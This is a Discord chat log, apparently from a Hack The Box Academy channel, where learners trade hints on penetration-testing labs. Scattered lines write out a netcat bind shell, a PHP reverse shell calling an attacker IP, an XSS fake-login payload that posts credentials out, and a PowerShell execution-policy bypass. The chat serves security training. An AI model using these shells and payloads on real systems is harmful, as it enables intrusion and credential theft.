#modules
Make sure you're on app.hackthebox.com, not the academy.
Hello! I’m new!!
is there someone who has done the logrotate lab of privilege escalation in linux? i am stuck on which log file i have to use...
Check the user directory
Anyone done with the Footprinting module? Need some hints for the DNS section.
can i dm you?
Did it
sure
who can help me in this module https://academy.hackthebox.com/module/143/section/1508
I can't find the bro's NT
Hello,
I was able to finish Password Attacks Lab - Medium, but for the last part it was combination of desperation/tips/luck. Could anyone explain to me ||how I was supposed to know that we can use Dennis private key to login as root user? Was I supposed to guess it from vim history and bash history?||
This thought is YES
Another thing is dennis was that only option left in that case, so trying and checking also comes into play
Password Attacks Lab - Hard
Can anyone help me in mounting xxxxxxx.vhd file ?
😭
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
Hi anybody tried registrytwo
The best way to ask is in #boxes
I dnt have access to that
I'm using enterprise htb web application
And I really need a complete guide as I'm just a beginner into this path🥺
Ubuntu
Please now I need help I know it's not easy please someone should come to my aid😭
I've wasted enough time trying to figure it out myself please
what exactly are you struggling with?
Network enumeration with Nmap
Easy lab answer
I used this @heady tusk
Then this @heady tusk yet I still get Linux as the operating system
@heady tusk
yeah no need to tag me all the time I'm here 😄
have you tried banner grabbing? that's usually a good way to get more details on OS
With netcat? Yes I've done yet no clue
on which port did you try that?
So sorry I was already frustrated by the way this has stressed me how'd the hard lab now be?
80
your best bet will be port 22 as ssh oftentimes has a banner which tells you the exact OS you're dealing with
Yes I also saw Ubuntu as the banner yet not correct
ugh that should be correct. my answer says "ubuntu"
Is it case sensitive?
I'd hope not but who knows 🤷
With the quotation marks?
no without
The answers are case sensitive
ugh really? that shouldn't be the case for something like this though
For all answers in HTB
well yes, but having ubuntu and Ubuntu count as correct would be good in this case
Hello can i have some help for the "Footprinting Lab - Hard" stuck on snmp enum, i try a lot of snmp enum code without success
sometimes the services running on open ports reveals what OS is running on the machine
have you obtained a community string already?
no i just have the snmp version
then cracking a community string will be your next move
thanks found it
awesome 🙂
Construct a valid SSL 3.0 padding of the plaintext bytes "AABBCCDDEEFF". Use the byte 00 for any byte that can be an arbitrary value. Provide the padded plaintext without spaces. Assume the cipher suite TLS_RSA_WITH_AES_128_CBC_SHA is used.
Can Anyone help I'm trying everything but I don't know whats wrong.
Hello everyone
Hi there, is anyone interested to study together Bug Bounty! I'm already doing Server Side Attacks!
Hey guys,
I'm kinda stuck on Windows PrivEsc Skill Assessment Part 1. Trying to do PrivEsc but Juicy Potato just won't work and from what I read PrintSpoofer doesn't work either. Also tried Metasploit's 'getsystem' which in the past worked for SeImpersonate but that also failed. any clues as to what I should look into?
either of them will work, I used Juicy Potato and it worked for me.
Could you explain where you are facing issue with
may I DM? I fear this is gonna be a bit longer
Sure
thank you!
Preparing for CPTS?
nop i use htb just for fun, im not thinking about getting certificates rn tbh
I see have fun then
is CPTS an important certificate?
I would say yes it is really good one to gain experience and learn awesome stuff
do you have to pay for getting it or it is just a certificate that you earn after a while?
You have to get it 210$ for exam
oh okay. don't think i will try it then, since i won't use it for getting a job
You have a job ?
It's a good cert and I'm enjoying the path so far but it's still not known in the industry
i spoke to some HRs recently and they all want nothing other than OSCP lol
give it some time💪
What Shell extension do I upload here?
Im supposed to upload a shell
I think .php?! im not sure why tho
i study computer science but not in cyber security. i find it fun to learn this stuff, but i don't think i will study cyber security at university
have you tried that?
the writeup says so @lusty thicket
does any of the wappalyzer results on the right indicate that?
Cool Good luck
yeah it's a good path and from what I have heard the exam is quite good too
what module and section are on?
@vital adder its tryhackme lmao
but that discord support isnt too good
only like 2 competent helpers
Im just asking about the screenshot specifically
no wonder that look familiar
does the webalyzer result indicate what extension the shell should be?
the new thing? just ask on thm discord
nope
what does then?
no idea what kinda of question is that 🤣 generally just use a php shell
also why tf are you asking it here
I wonder what would they say if he asks something about HTB on THM server lol
its not a thm related question
lmao I sometimes forget the average age here
thanks tho
doesn't matter this channel is for HTB academy module
i saw a lot people doing exactly that back on my THM days 🤣
lol
why have you chosen htb and not thm? (just curious, never used thm before)
the chonky squirrel still have a good rank on THM lol
I wish I could do both 😂 I don’t want anything taking me away from my learning path here at HTB plus this discord community is super interactive
Best one I’ve ever been in
Lies
to be fair THM do have some good support because their main platform is about learning unlike HTB is for CTF
I paid for the yearly subscription maybe I’ll check it out what I find difficult here at HTB I’ll use THM to help me understand
the main selling point of THM is it's beginner friendly so stuff can get boring and doesn't go that depth
Super boring and they beat the concept into ya brain 🧠 with a lot of text so way more reading 📖
dang you spent a lot of time on THM then 😄
yeah I did too but only got up to 20k points. haven't done anything on THM for quite a few months now
I started that but didn't get far cause I was busy with other stuff and then I kinda just forgot
do y'all know anyone who finished Wreath? if it's good I might do it eventually
that network is not the best but not bad at all also if you still have an subscription checkout the holo network that one is a better but you kinda have to follow the room (i think) doing that blind is a bit hard because the path is too custom
*pivoting and Tunneling
Port forwarding with windows Netsh
I am unable to rdp into victor in ip:8080 is there any error in the question ?
v2 still uses community strings if that's what youre asking
it's v3 that uses uname and pass
^
I am asking how can I bruteforce the strings with hydra
I mean
Listen you may not be prepared to hear what the public string is for that lab
Aka you're overanalyzing the output
¯_(ツ)_/¯
maybe hydra is stopping on first one it finds, I'd try hydra again with just the string internal and see if it picks it up
if not then hydra's snmp is flawed
where can I get technical assistance?
Contact the support
Need some help? Learn how to reach the support team on Academy.
no assistance / consultion in here as well?
Depends on what exactly you're talking about.
The support usually does not read here
If you have questions about modules, etc, you can ask them here. But not technical support.
Hi guys, I'm stuck in the heartbleed module. Could you help me, I have successfully exploited and got the private key using different method but they have asked for the d value, which I think can be only obtained by the process they used in the module. I'm not able to find the heartbleed.jar file. Could you give a nudge on this?
..
..
Hi there, I'm working on the web requests module, page 4, HTTP headers, supposed to use the browser devtools to find the request to the flag file, reset the target a couple times now and still not seeing it 😕 am I missing something?
Download TLS-Breaker like it mentions.
i believe the instructions were stated in the module
I just started with htb, I'm on tier zero I have no idea on how to get the root flag
and you have to refresh the page while the network tab in dev tools is open
I'm using kali linux as my primary os
what module are you talking about
Learn the basic of penetration testing, I believe
Thanks tips lol. I only see 2 get and a spawn/container/223 when I reload, nothing called 'flag_...'
Starting point
then you must be doing something wrong
there’s no module with that name lol
Probably 😆
Starting point. He is at starting point machines lol
the nibbles machine?
which machine specifically are you looking for help with?
yes, it’s supposed to be pretty straightforward
Can I dm you?
I'll try restarting the dang laptop...
bdw guys how do I know if my discord verification worked ?
you'll get a discord role
it didn’t 
Meow
dont say that again
Lol😭 why?
What have you tried so far?
I've been able to download openvpn and launch it through my terminal, and answered a bunch of basic questions, answered all but the last step I'm to submit root flag and I don't know what to do
have you run linenum on the target machine?
check your nmap results. what's the port that is open? how can you use that information to get in and get the root flag?
All 1000 scanned ports on (Ip) are in ignored states
xD
what machine are you talking about?
Meow
Did you manage to log into the machine?
I'm guessing yes since you said you're only stuck at the last question. Unless you guessed the answer for the second last question.
If you get into the machine the flag is right there
Yes I did guess
I downloaded the VPN for machine, and in my terminal I did open VPN lab_pathname.ovpn
No not connecting to VPN
What port did you answer on your Task 6? What's the question and the answer for your Task 7? Use these information to log into the Meow machine as your Task 7 answer.
also #starting-point is the channel for asking questions about starting point machines
INTRODUCTION TO NETWORKING is very useful for pentesters? 🤔 I mean, we have some knowledge from Getting Started, NMAP etc.
What subject is important in this module.
That depends entirely on your previous experience.
I did SQLi, Getting Started Module, NMAP.
quick question. did you practice any machines before the exam or you know of any machines that'd be a good practice before attempting the exam?
I did not do any extra study for the exam - I went in raw. The only machines that can give you any kind of preparation are the prolabs, but I have not done them myself.
Alright thankss
23/tcp
what protocol uses port 23?
What username is able to log into the target over telnet with a blank space and the answer is root
telnet
Telnet
I hate to be asking for help on something that looks to be so basic
yes im trying to hint him towards the right direction haha
I am on the Laudanum module
haha
after uploading the demo.aspx file
I browse to http://status.inlanefreight.local/files/demo.aspx and 404 error
great. now how'd you use telnet to connect to Meow as root?
I tried \files\demo.aspx
same
can anyone point me to what I am doing wrong here
Im sure it is something stupid
you have everything you need. you just need to figure out how to use this information now
Telnet Ip
Meow login is root
Password I just hit enter
Nice. You did it
Just cat the flag now
hello y'all, I'm having this behavior with Attacking FTP from Attacking common services
the nmap result says the ftp accept anonymous connection but, when I tried to connect the conection is refused
anyone experienced that behavior?
Just did thanks alot, I think my problem is that I Googled and guess some of the answers
Can anyone help me with this?
I'd recommend taking a step back and going through some of the basics first. HTB Academy has some great modules and you'd find plenty more on YouTube for free.
Good luck!
This is a very finicky lab. You may need to respawn the target 5 times or so before the FTP service opens. You should also wait about 2 minutes after spawning the target to wait for FTP to load. Working on the same section right now.
kewl, can I DM?
For sure!
hello, I am in "Find the password for the ldapadmin account somewhere on the system" in winPrivEsc assessment one. Does anyone have a hint, ive been looking for quite a while now
INTRODUCTION TO NETWORKING is very useful for pentesters? 🤔 I mean, we have some knowledge from Getting Started, NMAP etc.
What subject is important in this module.
I did SQLi, Getting Started Module, NMAP.
This will help you when you are in Pivoting and tunneling modules and also when there are internal stuff running or you have to connect to host that are not on same network
I mean you should understand the basics of networking. Whether or not you need intro to networking is up to you
When I first started learning I sat down with TCP/IP Illustrated books and devoured like 3k pages on the subject
Forgot most of it but what I retained was a suitable foundation of networking
I read a blog it was not all about it but it was great resource
Bc I would like to pass EJPT before december and I would like to know which modules in HTB is useful :).
It is actually all of about networking stuff
Go for CPTS pathway it is a lot but it is not gonna hurt you
It's too for EJPT.
EJPT is a starter certif, not a expert certif.
Dude then I would recommend complete the information security pathway
And prepare for exam with course content
Interesting that OffSec is rolling out OCR Blue (defensive training) right as the Academy is rolling out their defensive lineup. 🛡️ Its nice to see these stellar blue team training modules becoming available.
?
Alr :).
hello everyone..may someone be kind enough to sponsor a voucher of gift card for academy? i am short on cubes. DM me
I am thinking of switching from CPTS to CBBH because I want to bug hunt really badly
and I think CBBH might be more focused
will complete Nmap module and then immediately transition
then can do CPTS later I guess
Module: Documentation and Reporting. Section: Lab. I completed the lab already but practicing Linux privesc techniques + command injection on the Linux machine. Already got in as www-data and looking around. Possible to get root on this box?
After this
I...... become so NUMB......
I can't 😂 feel you there...!
Thank you soo soo much @heady tusk and @tidal mango
HTB tore me apart... 😂
Upto Password Attacks of CPTS path, if anybody need any help feel free to ping/DM me up.
Will be glad to help
😁
oh man IMAP commands Yuck
IMAP 🤢
hurts my eyes
Does Evolution work for this section? - I can't get it to connect. https://academy.hackthebox.com/module/116/section/1173
gonna have to telnet
Could be 'evolution'ary to try.
Thanks, would try and get my Linux and network basics
sup yall
working on the footprinting hard lab and cannot load the ssh key
keep typing ssh -i id_rsa USER@IPaddress and getting LOAD KEY "id_rsa" invalid format
hey @rain briar although i dont have access to that module but you could try simple steps like:
1. delete all old key files that might cause confusion and download a fresh key
2. make sure to check the permissions of key file before running ssh'ing
3. ssh -i ~/.ssh/id_rsa username@example.com -p xxxx
please do correct me if I am wrong with any of the steps i am kinda new 
remember to fill in VHOST
One question about kerberos
the KDC can be a different machine than the DC right?
you can host the KDC in one server
and the DC in other one right?
Anyone completed the introduction to AD
I couldn't get it to work before. I just retried, thnx
I'm not an expert, but I don't believe so.
Yeah I don't either
https://learn.microsoft.com/en-us/windows/win32/secauthn/key-distribution-center
The KDC for a domain is located on a domain controller, as is the Active Directory for the domain.
nice find
ok thanks
How did you get rid of the image from the url?
Click on the x next to the image
👍
Can anyone help me in Threat Hunting & Hunting with Elastic Skill Assessment? I'm really having a hard time
You have to sudo chmod 600 to it
Attacking Common Services - Easy - You don't really need a full rev shell for this one fyi
Hats off fr to those that took that extra step.
Also, ||check the OS. You can't just copy and paste commands from the cheatsheet. Gotta alter things.||
Do you guys know if there is a way that I could try to do hack things off of my phone? I don't have a PC or laptop so I can't really do anything
You can do things with net hunter
But in some areas it's limited in vs to PC
Can you DM me the things that I need or no?
Oh sorry
Hello, There are some modules that do not have an practicing lab . Do these come with exam?
such as Attacking XSLT , ESI --> SERVER-SIDE ATTACKS
Hello guys i'm doing a privilege escalation i found a tomcat server running i logged in with credentials im just wondering if tomcat9.0.31 is vulnerable to any exploit ? Giving more privileges ?
i have a question for the Server-Side skills assessment|| is it normal if i didn't do any Server-side attacks but just JS deobfuscation?||
JS deobfuscation will assist you in Server-side attacks.
nc -lvnp 4444
Listening on [any] 4444 .....
stuck on this and show nothing, anyone can assist me?
you've set up a listener, and until something hits the port you've specified in the listener nothing will happen
what should i do
depending on the case, usually a reverse shell
can i dm u?
go ahead
friend request sent
my case is on starting point unified
Well, Unified has a walkthrough that can help you solve the machine
Additionally, you can check #starting-point
correct
but stuck on this :(((
~
AD Enumeration & Attacks - Skills Assessment Part I - Submit this user's cleartext password. - I can't seem to crack ||t***ty's|| password, Ive got the NTLM hash from ||Mimikatz||
If you have the NTLM hash, then it should be crackable with the rockyou password list.
Did you try rockyou
👍🏼
Are there any good modules that teach about evasion techniques? I want to start Offshore soon and it makes me realize that I am probably not prepared for any AV or EDR
can i only do 1 module a day? i just did the intro to HTB but now i can't use the screen for another course
Pivoting and Tunneling module
Port forwarding with Windows Netsh
I uploaded the dnscat2.ps1 but when I transfer this to my pivot host PowerShell blocks the execution and HTB did not mention that you need to bypass it or not
No, unfortunately there are no such modules so far.
PowerShell blocks external modules or scripts from being loaded by default. But you can work around this. It is also shown in the modules.
Set-ExecutionPolicy Bypass -Scope Process
I was trying to bypass that with encoding and stuff and it was not working thank you am gonna try this one idk how I did not remember this
iirc the metasploit module talks about antivirus evasion when crafting a payload, and on Active directory enumeration and attacks module, you have some information about antivirus enumeration and evasion
Yea I remember shikataganai and some stuff about not dropping files on the drive but launching from memory instead, but that’s basically all
hi! i have a question regarding module 103 - cross site scripting exercise
i have followed the instructions with regards to the payload
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
however i do not get the desired "look" of the page.
it seems broken
The modules are usually structured in such a way that you cannot apply them 1:1. You have to change your code a bit most of the time.
ohh that makes sense
I'm trying to start with the very first mod in htb and have bought vip but I'm about to unsubscribe as the very first thing cant even be completed because it refuses to detect I've spawned a machine on the website. I've done so about 10 times with it never detecting its done so I cant do anything
wdym?
Can you send screenshots and what module are you working on
I am working on screen shots right now
2nd tab is the open machine but it still says I have to spawn the target machine and the ip will show
oh, that's on the main platform, try refreshing the page.
I have 15 different times
Why there are 2 connections ?
that I dont know because I only have 1
idk what's the problem tbh, but as PTShinobi pointed to the two connections, try reseting ur vpn. and see where that leads, if it doesn't help, u can check with support i think and ask on #1024429874246590575
hi guys im in the middle of the footprinting module and sqlplus is giving me this
any chance one of you has come across it before ?
check if the oracle library is installed on your vm
Could anyone help me with the Attacking Common Applications - Skills Assessment II?
i figured it out in the end its actually listed in the module
yes
What do you need help with?
On the first question "What is the URL of the WordPress instance?"
I've made fuzzing to search for subdomains but nothing
what about other ports ?
Look at the text of the task again.
There is a vHost that you should better investigate.
Could I DM?
sure
can anyone help me in dms about shell anatomy module
I think the user has joined any season running box and then joined normal boxes.
Similar happened with me
Hello everyone. The most comprehensive and cutting edge NTLM relaying material was just released. Hope everyone likes it 🔥
Why don't the new modules get new cool badges anymore?
Cool modules should get cool badges
I think this is the default one until they are assigned one
Yes, I suppose so.
hi @kind turret can i dm you for a bit? i just have some question about getting into module development
Maybe the HTB graphic designer is on vacation 🙂
Hi, can anyone help me with assembly? Got stuck on a basic assessment task 
Hi Guys Im in the Footprinting Lab Easy i have the command to get the keys says its downloading files gives me the number of files downloaded and the size but somehow the folder is empty
I beg to differ here @Pedant...I'm currently on the same exercise in the CRLF log injection attacks section and the question asks you to get command execution by injecting into the log file. The example it gives is PHP injection into the logs. However, anything you attempt to inject into the log, for example %0d%0a, or < or > or %3c gets stripped out by something and so doesn't work. So there is clearly some kind of filtering happening which I assume you have to bypass to achieve RCE?
Active Directory Attacks and enumeration, I am stuck on the question that asks me to compromise the Domain Controller, Ive got the Hash of the password of some important accounts but I cant crack them
You can’t pth?
I came across this page:
This guy literally copied and pasted htb's content as his article. Even with flags visible. Is this even allowed? Should this be reported?
It should be reported, and not shared here.
ok, deleted the link. Who do I report it to?
Use site support.
got me here lol. I'll look around. Thanks
Idk? You tell me?
Yes
wait how? did support redirect you here or the bot (forgot the name)
no, I was looking how to get in touch with someone. THe support page just show faq's.
I started a chat on htb's page. that should do 🙂
oh then in that case report this to people at support when you get in touch with them
or i actually have report thing like this to @west canopy before maybe give him a ping about this
shoot me a dm on what the hell are you trying to here 🤣 (the download command is ||get||) if you still need help
Guys how I can enable bidirectional shared clipboard in htb academy machine???
use Full Screen
I think htb should curate their random(??) username list ||inlanefreight.local\luder1954 ||
find / -type f -name "*.config" -newermt 2020-03-03 -size -28k -size +25k
Could someone give me some guidance on what I'm doing wrong? I'm getting about 100+ files with this specification
No, cuz its on a separate computer lol
Just a hunch, but could it be that there is a difference between modify and creation time?
yeah this ones getting me, I tried just newer and I don't think that's a command
the only command the module has taught at this point is newermt
which module and section are you on?
Try the man pages, part of htb academy is also googling things you don’t know. Look for newerXX , the flags like m and t are described separately
Linux fundamentals, files and directories - I think I'm getting closer. And trust me, I'm not asking you as my sole resource I'm definitely digging for this.
I try to avoid asking for help here unless I'm really stuck, as typically people make comments shaming that as if one is not resourceful =p
this is good because some people just give in and ask for help right when the first thing they try doesn't work 🤣 don't want to point finger because there is too many and i don't have enough finger
Hello, I still stand by that it is not about bypassing filters. DM me to get a conversation about it 😉
you can check the search, I never ask here. I thought maybe
find / -type f -name "*.config" -newermt 2020-03-03 ! -newermt 2020-03-03 -size -28k -size +25k
would fix it, but still kicks back a few hundred files. still digging in
It may be wrong, but I go to GPT for most of my help because it can really break things down very precisely
that's weird i have this command in my note but with .conf (not config) and the 2>/dev/null for dealing with the error part
oh man, it may be the .conf.
yea give that a try if you still get like 100+ file i'll double check it
use 2>/dev/null at the end of your command
Gotta get to work, I'll circle back in a bit.
oh no that is just for filtering out the permission denied
I tried ||sekurlsa::pth /domain:INLANEFREIGHT.LOCAL /user:administrator /ntlm:<Hash> /impersonate||, but I can't get it to work, I am still on the MS01 Computer and I can't list files on the DC01 computer
@hexed void ok so as far as my ape brain can see both of your command is the same if this is the case and you count the error as an output then that's the issue
just give your command a try with the 2>/dev/null thing at the end (for filtering error) and that give me back 1 single file
*with the .conf
I keep having issues logging into the workstation in the Active Directory Enumeration & Attacks section. Has anyone else experienced this? I know I have the credentials correct as they are just the standard ones on the page, so unsure as to what it could be.
Are you typing the password out?
100% not
have also tried typing to see if I am going crazy but nope
I've also restarted the machine numerous times
It's annoying as I cannot progress as I need to now use tool on a domain joined windows host
what tool are you using for this?
as in what RDP tool? redesktop or xfreerdp
if you mean by needing to progress, snaffler
this is have spoiler shoot me a dm, i'll help you troubleshoot
Thanks
any idea how to solve this question, module DOCUMENTATION & REPORTING ? Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.). i have inputted [ctrl] + [b] + [%] as answer but its wrong
hello,
I am doing web request - header request.
And I found the flag_... in the request header. But the flag is not accepted, what can I do?
have you checked in the network tab raw response headers?
yes. I have submitted flag....txt, flag..., the whole response header, and any combination I can think of. But nothing was accepted.
sorry, my bad. I have the answer.
The answer is explicitly in the module's text, copy what it says there
I ran into the same issue as well
@trail leaf can i dm you

Anyone able to DM for help with a module? I've spent hours on this and I'm honestly getting pretty over it.
find / -type f -name "*.conf" -newermt 2020-03-03 ! -newermt 2020-03-03 -size -28k -size +25k 2>/dev/null
just gives me an empty line afterwards
Not sure I follow what you mean, I don't know the file name that's what I'm searching for by specific criteria. the examples given by the module show me it wouldn't be -type *f
There's over 100 files in this SSH that are .configs between 25 and 28k in size
it wants "the one"
This is the first time I feel like the material did not set me up to be able to figure this out, hence me coming here. And theres been some tough ones coming up to this.
which module and section is it again?
find files and directories, linux fundamentals
gotcha haven't done that module sadly
I dont think the -newermt ! -newermt will get you what you need. That would restrict the search on files modified exactly on that date, you need one created after this date
you could try -newerBt to look for a birth date newer than the provided date
yeah I think its just -newermt, not both
we haven't learned newerBT yet
the one newermt would mean files created after that date, which is what it wants
in my head modifydate and creationdate are not the same thing
and dont expect the module to teach you the exact command, the assessments are often set up in a way that you need to research a little yourself or modify the example from the module text to make sure you really understand what you are doing and not just copy pasting the module content
yup very common theme
assessments are almost exclusively designed to challenge your conceptual knowledge, not your rote memorization and ability to follow given steps
I tried the command you posted above (without the ! -newermt 2020-03-03 part) and it gave me the correct file
?
how do you know its the file if you didn't specify its creation date?
find / -type f -name "*.conf" -newermt 2020-03-03 -size -28k -size +25k 2>/dev/null
just the 2nd part I mean
it runs a few seconds and returns one line, the file you need
Honestly, looking at that code, I feel like I've run that exact one like 3 times so I'm kind of at a loss. But thank you
I need to spend more time understand the dev bit at the end.
I think when you tried this earlier you did it on *.config and then by the time you switched to *.conf you added other stuff to the command that made it not work
the 2>/dev/null can be used behind any command to redirect the error output to a file, our "file" in this case is /dev/null which basically means "discard all error messages". Otherwise your output gets spammed with "Permission denied on file xyz"
that makes a lot more sense. thanks man.
This one got me pretty frustrated lol. I'm gonna saturate on this one for a while.
yeah 2>/dev/null is a game changer. everything seems to line up with it.
I tell ya what I learned today: services can hide inside other services! hahha
I just completed the Password Reuse / Default Passwords box inside the Password Attacks module.
Makes me wonder what services were hiding in other boxes when I just did an nmap and assumed that's all there was to find...
wdym services hiding inside other services
the ||mysql only accessible once you're already in ssh||
Thats not a service hiding inside another service
thats because the firewall was blocking access externally
but once you have access to the host, well firewall isnt gunna block the host from itself now is it?
Its a meaningful difference
Because there can be conceivably other ways to reach that service that had nothing to do with ssh. So thinking it of a service inside another service is very limiting to your mental model of the target
yep, good point
as opposed to something like a service running inside a docker container which could be reasonably viewed as a service inside another service and would warrant a different line of thinking to tackle
hahah I tell you the second thing I learned today....
hey thanks for pulling me up on that lazy thinking. I'm now sitting here revising a bunch of my notes as a result.
np
Hey guys
Can anyone please explain the bind shell with netcat module code: rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f ?
Each individual command makes sense, but I don't see how this gives you a bind shell.
Also the module is unclear as to whether the IP is the attack box or the target.
explainshell.com didn't give enough detail
I've done some searching and everything I've found is related to stderr and stdout.
ChatGPT might be able to iterate it better for you. Also, the IP is your ip a ip.
The next command is nc -nv 10.129.41.200 7777 from the attacking machine though, so wouldn't we just be connecting back to our own machine?
That's where I'm confused
The key there is that it uses a fifo object, in order to redirect input/output. Output of what happens in the bash shell is sent to your netcat listener. Input from the netcat listener is sent to the fifo, which creates the loop, feeding back into bash.
I'm starting to understand the breakdown a bit, I just don't see how we get a shell from the attack machine when the -l is on the target
how i can get numbers in a specific range using the grep command?
I also don't understand the "cat /tmp/f" portion. We haven't put anything in that file, what is it concatenating, or does that come later in the lesson?
That's reading the fifo. Try to make a fifo object and mess with it.
So let's see if I have this correct: We remove tmp/f if it exists, put a FIFO object there, which is kind of a placeholder, and then concatenate it, but at the same time that concatenation is piped to a shell (/bin/bash) where stderr and stdout are combined into an interactive shell, and then that's piped to a listener with the IP of the attacking machine which writes each command back to the FIFO being concatenated, which then effectively gives us the ability to connect with -nv and get a shell.
I think the IP is the target IP
now that I'm painfully wrapping my head around this
please correct me if I'm wrong, and thank you both for the help @proud pine and @gloomy bramble
Here is a sample of one I use sometimes: <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.XXX 4444 >/tmp/f"); ?> That is my ip a ip
It's specifically the tun0 ip
ip a just shows all ip interfaces
yea, my bad, i just meant that I use ip a to find that ip address. should have said tun0, thanks for the correction.
ah, I see, so you would ip a on the target machine to find tun0?
Did my explain what I think I just learned back to myself like I'm 5 version sound close to what's going on?
The IP it uses is your local IP.
You run a nc listener, waiting for that payload to connect to you.
So in the case of the VPN connection, yeah, it would be your tun0 IP
In the case of an over-internet situation, it would be your WAN IP, and in the case of a pivot situation, the 'next hop' before it reached you.
grep should support regex without supplying any new flags iirc, but it's definitely been more consistent if you use the -E flag
Even for a bind shell?
Oh, I didn't see you had used a bind variant.
yeah, my bad, I realized that detail wasn't inherent to my question.
So it would be their IP?
I don't think I've ever used nc for a bind shell, but yeah, it looks like you can specify the IP for -l, and you'd use whatever is facing your attack box.
Okay, makes sense. Thanks for the help.
The rest of the function of the shell command remains the same, since the loop it built is just based on the input/output from nc and bash.
Hi there, i'm working on the module Windows Priv Esc, and am currently at an impasse on the Skills Assessment I page, where I have a low priv user powershell on the target system but can't find the credentials or escalate my session using JuicyPotato or PrintSpoofer. Any help or nudge in the right direction would be appreciated! thanks!
Edit: NVM Solved!
yo guys any idea on the catch the flag cft input key?
ssh username@ip
just saw that. 🤦♂️ thanks for the quick reply though
any tips on how i should go about with this?
Google it tbh
i did and got the answer. didn't occur to me when i got stumped. will be a point of reference in future 🤣
Thanks for not taking my statement as sass lol. There's a fair bit of googling needed/required to get some things down
i remember seeing that and somehow am glad the concept of 'google' came up from the back of my head before i read it here 🤣
i saw that as a honest opinion, we cool
Hello everyone,
I'm seeing many people complaining about the module "Password attacks - Cracking file".. So I'm just another one 🥳
The question is:
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
My analysis:
We can see the port 21 (ftp) is open on the target. We have a login: Kira.
Goal:
Mutate the password list with rule in resources, apply it on the password list.
So I tried to : hydra -l kira -P The_Password_list_mutated.txt -t 48 ftp://Target_IP
Problem: the bruteforce will take 3h30 to try all of them.
Question 1 : Do we have Kira password? (I checked other module in password attacks, nothing)
Question 2: Is that the correct plan? (mutate the passwordlist + bruteforce)
Thanks in advance and have fun 🫡
Edit: The plan was correct, we have to wait 15min
kira - lowercase is important here. You can increase threads
But also this is the same kira from earlier in the module
Yup you're right, we can put on hydra "-t 64"
Looking for the password, yes... I was pretty sure I already saw it somewhere.. But forgot where x)
be careful with too many threads on hydra, too many connections can make it time out valid attempts and accidentally skip credentials
correct, I re-tried to crack the password for kira on ftp with -t 64, Hydra didn't find it, but with -t 48, it finds it correctly
🫡 sup big boy
I'm good man and you???
Are you a hacker like me too man ???
Good thanks! Yes I try to become better in this everyday! Next month I hope I could do the CPTS
is the lab broken for xss hijacking? i can't seem to send the request when i click register
should i take part in ctf events even if i have not completed the modules yet or should i wait for ctf
u will apply for certificate?
Try. If you can do it, perfect. If not, keep learning
Make sure you're launching the connect command from a writable directory e.g. /tmp/
What is the error you're getting from smb?
Are you sure you're doing the connect command correctly?
You need to blur out any names/passwords my guy
Well have you actually tried connecting AFAIK smbmap only scans it doesn't do interactive connection
*I haven't used smbmap much
I didn't use smbmap so wouldn't know. Just used standard smbclient ¯_(ツ)_/¯
can anybody help me with logrotate ?
Ask your question more specific
Hello, I'm doing the NMap module on HTB Academy and just wondering if there is a quicker way to run NMap scans on my own VM as they are taking a while
Hi, is anyone available to help with the Linux File Transfers module? I am unable to use gunzip to extract the zip file.
Perhaps you could use a -T4 flag?
Hello! I'm stuck on the Documentation and Reporting practice lab. I can't work out how to get Domain Admin. I got a lot of hashes through Responder and cracked them all, but when I RDP in that server is not the DC. I looked through all the findings and found that the DC IP is ||172.16.5.5|| but none of the other credentials got me in. I feel like I'm overthinking this, can someone give me a nudge?
I think it's just a regular zip file you can unzip
Gave that a go but unzip isn't installed on the target system
and using the hint command just throws an error because the file isn't a .gzip
Target system is windows yeah?
a quick google give me
https://nudesystems.com/nmap-timing-options-when-and-how-to-use-them/
and
https://nmap.org/book/performance-timing-templates.html
Try tar -xf {filename}.zip
I have moved on for now, but thanks for the solution 🙂
if you are new here read #welcome and #rules if you are on HTB use /verify at #bot-commands to verify your account, this channel is for HTB academy
Ok
Diamond And Sapphire Tickets needs to be on attacking kerberos
which modules are a must for starting easy machines in HTB? if there are any. i don't want to start too early
I'm stuck on the Footprinting NFS module. When I attempt to mount the NFS share, I get the error: mount.nfs: access denied by server while mounting 10.129.202.5:/. I have tried appending the file paths shown when I run showmount -e, but get the same error. I know this is probably a simple issue, but I've been stuck on this for hours. Google and ChatGPT have proven unhelpful. Any advice?
https://academy.hackthebox.com/module/116/section/1468#questionsDiv - Attacking Common Services - Hard - yo this assessment is a pain. I learned SQL syntax I never used before in PWK.
You solved it lol ?
Pivoting and Tunneling
I'm not even close to that yet haha
Help me when you reach 9/18 lol
did that one. I did them a little out of order for extra learning to take the OSCP and eventually the HTB exam.
I am stuck
Password attacks?
btw the modules should be followed in the way they're in the path or is there a better way?
It is better to follow the order
I changed Vpn to US
Tried with remmina rdp
Even added the /d:DC flag for domain
I agree, I am doing only certain ones as a knowledge gaps. Practice on the module where I know I am weak like SQli. This is only because I have time constraint and am using the HTB academy to supplement my OSCP exam training.
That's good you have different goal so it does not matter but for CPTS you have to follow order
💯
Making my way through CPTS after this
if you use a university email with subscription you don't have to pay for unlocking modules. but do you earn cubes from this modules?
I've just barely started it. Completed 2 modules and it's quite nice
You only get modules up to Tier 2 and yes you get cubes. I am using my student email as well.
oh is this specified in the subscription section? i didnt read it
You can get CBBH and CPTS modules access as long as you have sub which is 8$ per month
Anyone to help me on this ?
Also the SOC path now.
you're on pivoting- I just started that section
i'll be happy to help once I get there m8
Okay sure thank you
Am trying to figure
Out if there is anything I can do to understand the issue
it depends on what box you want to do, even boxes without the CTF bs there is still a shit ton of boxes about all of the topics you can think of, so just do the module that has the same topic as the box you are looking to try your hand on
try sudo mount -t nfs (ip):/ /mnt -o nolock
Desperately
which section?
you have an connection error try scanning that port to see if you even have access
also with pivot method like this one you desperately can't ping
what port you are using isn't really important
the main thing if you have tunnel setup right or not
look about right nmap show anything?
Let me try that as well
